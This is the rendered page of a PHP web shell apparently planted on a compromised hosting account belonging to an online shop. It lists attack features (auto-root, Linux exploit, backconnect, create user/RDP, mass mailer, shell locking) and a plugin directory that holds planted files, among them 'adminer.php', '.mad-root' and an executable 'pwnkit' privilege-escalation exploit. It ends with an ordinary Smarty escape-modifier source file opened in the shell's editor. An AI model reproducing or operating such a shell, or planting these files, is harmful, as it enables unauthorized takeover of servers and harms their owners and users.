Linux webm004.cluster102.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.102.20.4 | : 216.73.217.153
Cant Read [ /etc/named.conf ]
5.4.45
opusyn1t
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
opusyn1t /
www /
boutique /
tools /
smarty /
plugins /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
autoload_classmap.php
0
B
-r--r--r--
block.textformat.php
3.16
KB
-rw----r--
function.counter.php
1.79
KB
-rw----r--
function.cycle.php
3.17
KB
-rw----r--
function.fetch.php
7.77
KB
-rw----r--
function.html_checkboxes.php
7.83
KB
-rw----r--
function.html_image.php
5.19
KB
-rw----r--
function.html_options.php
7.09
KB
-rw----r--
function.html_radios.php
6.95
KB
-rw----r--
function.html_select_date.php
14.23
KB
-rw----r--
function.html_select_time.php
12.94
KB
-rw----r--
function.html_table.php
5.3
KB
-rw----r--
function.implode.php
921
B
-rw----r--
function.mailto.php
5.33
KB
-rw----r--
function.math.php
2.83
KB
-rw----r--
index.php
1.24
KB
-rw----r--
modifier.capitalize.php
2.92
KB
-rw----r--
modifier.date_format.php
2.21
KB
-rw----r--
modifier.debug_print_var.php
3.39
KB
-rw----r--
modifier.escape.php
7.26
KB
-rw----r--
modifier.regex_replace.php
1.52
KB
-rw----r--
modifier.replace.php
834
B
-rw----r--
modifier.spacify.php
761
B
-rw----r--
modifier.truncate.php
2.09
KB
-rw----r--
modifiercompiler.cat.php
636
B
-rw----r--
modifiercompiler.count_charact...
912
B
-rw----r--
modifiercompiler.count_paragra...
672
B
-rw----r--
modifiercompiler.count_sentenc...
754
B
-rw----r--
modifiercompiler.count_words.p...
974
B
-rw----r--
modifiercompiler.default.php
785
B
-rw----r--
modifiercompiler.escape.php
4.87
KB
-rw----r--
modifiercompiler.from_charset....
761
B
-rw----r--
modifiercompiler.indent.php
711
B
-rw----r--
modifiercompiler.lower.php
734
B
-rw----r--
modifiercompiler.noprint.php
407
B
-rw----r--
modifiercompiler.string_format...
585
B
-rw----r--
modifiercompiler.strip.php
818
B
-rw----r--
modifiercompiler.strip_tags.ph...
723
B
-rw----r--
modifiercompiler.to_charset.ph...
755
B
-rw----r--
modifiercompiler.unescape.php
1.16
KB
-rw----r--
modifiercompiler.upper.php
694
B
-rw----r--
modifiercompiler.wordwrap.php
1.53
KB
-rw----r--
outputfilter.trimwhitespace.ph...
3.39
KB
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
shared.escape_special_chars.ph...
1.63
KB
-rw----r--
shared.literal_compiler_param....
1001
B
-rw----r--
shared.make_timestamp.php
1.27
KB
-rw----r--
shared.mb_str_replace.php
1.71
KB
-rw----r--
shared.mb_unicode.php
1.48
KB
-rw----r--
shared.mb_wordwrap.php
2.76
KB
-rw----r--
variablefilter.htmlspecialchar...
432
B
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : modifier.escape.php
<?php /** * Smarty plugin * * @package Smarty * @subpackage PluginsModifier */ /** * Smarty escape modifier plugin * * Type: modifier<br> * Name: escape<br> * Purpose: escape string for output * * @link http://www.smarty.net/manual/en/language.modifier.count.characters.php count_characters (Smarty online manual) * @author Monte Ohrt <monte at ohrt dot com> * @param string $string input string * @param string $esc_type escape type * @param string $char_set character set, used for htmlspecialchars() or htmlentities() * @param boolean $double_encode encode already encoded entitites again, used for htmlspecialchars() or htmlentities() * @return string escaped input string */ function smarty_modifier_escape($string, $esc_type = 'html', $char_set = null, $double_encode = true) { static $_double_encode = null; if ($_double_encode === null) { $_double_encode = version_compare(PHP_VERSION, '5.2.3', '>='); } if (!$char_set) { $char_set = Smarty::$_CHARSET; } switch ($esc_type) { case 'html': if ($_double_encode) { // php >=5.3.2 - go native return htmlspecialchars($string, ENT_QUOTES, $char_set, $double_encode); } else { if ($double_encode) { // php <5.2.3 - only handle double encoding return htmlspecialchars($string, ENT_QUOTES, $char_set); } else { // php <5.2.3 - prevent double encoding $string = preg_replace('!&(#?\w+);!', '%%%SMARTY_START%%%\\1%%%SMARTY_END%%%', $string); $string = htmlspecialchars($string, ENT_QUOTES, $char_set); $string = str_replace(array('%%%SMARTY_START%%%', '%%%SMARTY_END%%%'), array('&', ';'), $string); return $string; } } case 'htmlall': if (Smarty::$_MBSTRING) { // mb_convert_encoding ignores htmlspecialchars() if ($_double_encode) { // php >=5.3.2 - go native $string = htmlspecialchars($string, ENT_QUOTES, $char_set, $double_encode); } else { if ($double_encode) { // php <5.2.3 - only handle double encoding $string = htmlspecialchars($string, ENT_QUOTES, $char_set); } else { // php <5.2.3 - prevent double encoding $string = preg_replace('!&(#?\w+);!', '%%%SMARTY_START%%%\\1%%%SMARTY_END%%%', $string); $string = htmlspecialchars($string, ENT_QUOTES, $char_set); $string = str_replace(array('%%%SMARTY_START%%%', '%%%SMARTY_END%%%'), array('&', ';'), $string); return $string; } } // htmlentities() won't convert everything, so use mb_convert_encoding return mb_convert_encoding($string, 'HTML-ENTITIES', $char_set); } // no MBString fallback if ($_double_encode) { return htmlentities($string, ENT_QUOTES, $char_set, $double_encode); } else { if ($double_encode) { return htmlentities($string, ENT_QUOTES, $char_set); } else { $string = preg_replace('!&(#?\w+);!', '%%%SMARTY_START%%%\\1%%%SMARTY_END%%%', $string); $string = htmlentities($string, ENT_QUOTES, $char_set); $string = str_replace(array('%%%SMARTY_START%%%', '%%%SMARTY_END%%%'), array('&', ';'), $string); return $string; } } case 'url': return rawurlencode($string); case 'urlpathinfo': return str_replace('%2F', '/', rawurlencode($string)); case 'quotes': // escape unescaped single quotes return preg_replace("%(?<!\\\\)'%", "\\'", $string); case 'hex': // escape every byte into hex // Note that the UTF-8 encoded character ä will be represented as %c3%a4 $return = ''; $_length = strlen($string); for ($x = 0; $x < $_length; $x++) { $return .= '%' . bin2hex($string[$x]); } return $return; case 'hexentity': $return = ''; if (Smarty::$_MBSTRING) { require_once(SMARTY_PLUGINS_DIR . 'shared.mb_unicode.php'); $return = ''; foreach (smarty_mb_to_unicode($string, Smarty::$_CHARSET) as $unicode) { $return .= '&#x' . strtoupper(dechex($unicode)) . ';'; } return $return; } // no MBString fallback $_length = strlen($string); for ($x = 0; $x < $_length; $x++) { $return .= '&#x' . bin2hex($string[$x]) . ';'; } return $return; case 'decentity': $return = ''; if (Smarty::$_MBSTRING) { require_once(SMARTY_PLUGINS_DIR . 'shared.mb_unicode.php'); $return = ''; foreach (smarty_mb_to_unicode($string, Smarty::$_CHARSET) as $unicode) { $return .= '&#' . $unicode . ';'; } return $return; } // no MBString fallback $_length = strlen($string); for ($x = 0; $x < $_length; $x++) { $return .= '&#' . ord($string[$x]) . ';'; } return $return; case 'javascript': // escape quotes and backslashes, newlines, etc. return strtr($string, array('\\' => '\\\\', "'" => "\\'", '"' => '\\"', "\r" => '\\r', "\n" => '\\n', '</' => '<\/')); case 'mail': if (Smarty::$_MBSTRING) { require_once(SMARTY_PLUGINS_DIR . 'shared.mb_str_replace.php'); return smarty_mb_str_replace(array('@', '.'), array(' [AT] ', ' [DOT] '), $string); } // no MBString fallback return str_replace(array('@', '.'), array(' [AT] ', ' [DOT] '), $string); case 'nonstd': // escape non-standard chars, such as ms document quotes $return = ''; if (Smarty::$_MBSTRING) { require_once(SMARTY_PLUGINS_DIR . 'shared.mb_unicode.php'); foreach (smarty_mb_to_unicode($string, Smarty::$_CHARSET) as $unicode) { if ($unicode >= 126) { $return .= '&#' . $unicode . ';'; } else { $return .= chr($unicode); } } return $return; } $_length = strlen($string); for ($_i = 0; $_i < $_length; $_i++) { $_ord = ord(substr($string, $_i, 1)); // non-standard char, escape it if ($_ord >= 126) { $return .= '&#' . $_ord . ';'; } else { $return .= substr($string, $_i, 1); } } return $return; default: return $string; } } ?>
Close